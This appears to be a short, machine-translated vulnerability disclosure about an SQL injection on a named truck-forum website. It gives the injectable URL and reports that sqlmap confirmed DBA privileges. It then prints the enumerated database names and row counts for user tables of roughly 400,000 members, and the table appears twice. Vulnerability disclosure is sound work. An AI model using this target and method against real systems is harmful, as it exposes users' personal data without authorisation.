An SQL injection vulnerability exists in a station in the truck House (DBA permission + 0.4 million user data)
An SQL injection vulnerability exists in a station in the truck house
Injection URL:
http://auman.360che.com/viewthread.php?tid=397430&page=3
0x00 first try it manually
An error is reported. The SQL injection vulnerability is obvious.
0x01 sqlmap Verification
Injection exists and the DBA permission exists.
Existing Database
available databases [20]:[*] 360che[*] 360tools[*] auman[*] cms[*] diaocha[*] ershouche[*] faw_choujiang[*] gtl_460[*] gtl_zaihuoche[*] huvh[*] information_schema[*] jiefang[*] kucunche[*] limesurvey[*] mysql[*] performance_schema[*] qdjiefang[*] shanghaichezhan[*] sms[*] zhuanti_jac
0.4 million + User Data
Database: 360che
+ ----------------------- + --------- +
| Table | Entries |
+ ----------------------- + --------- +
| Uc_pms | 10300481 |
| Uc_friends | 421112 |
| Uc_memberfields | 417407 |
| Uc_members_11 | 417390 |
| Uc_members | 417388 |
| Shouji | 400000 |
| Mobile | 1, 273683 |
| Uc_newpm_bak | 265691 |
| Uc_members20130702. | 213705 |
| Tianyamember | 177717 |
| Uc_members20120117 | 102331 |
0.4 million + User Data
Database: 360che
+ ----------------------- + --------- +
| Table | Entries |
+ ----------------------- + --------- +
| Uc_pms | 10300481 |
| Uc_friends | 421112 |
| Uc_memberfields | 417407 |
| Uc_members_11 | 417390 |
| Uc_members | 417388 |
| Shouji | 400000 |
| Mobile | 1, 273683 |
| Uc_newpm_bak | 265691 |
| Uc_members20130702. | 213705 |
| Tianyamember | 177717 |
| Uc_members20120117 | 102331 |
Solution:
Filter parameters.